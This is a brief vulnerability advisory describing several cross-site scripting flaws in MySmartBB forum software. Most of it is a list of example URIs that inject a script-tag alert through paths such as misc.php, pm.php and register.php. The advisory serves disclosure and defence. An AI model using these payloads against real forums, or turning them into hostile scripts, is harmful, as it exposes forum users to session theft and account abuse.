MySmartBB Multiple Cross Site Scripting Vulnerabilities

MySmartBB Multiple Cross Site Scripting Vulnerabilities

To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URI.

The following example URIs are available:

http://www.example.com/MySBB/misc.php/>'><ScRiPt>alert(469588561854)</ScRiPt>
http://www.example.com/MySBB/index.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/memberlist.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/MySBB/new.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/MySBB/pm.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/MySBB/register.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/MySBB/search.php/>'><ScRiPt>alert(213771818860)</ScRiPt>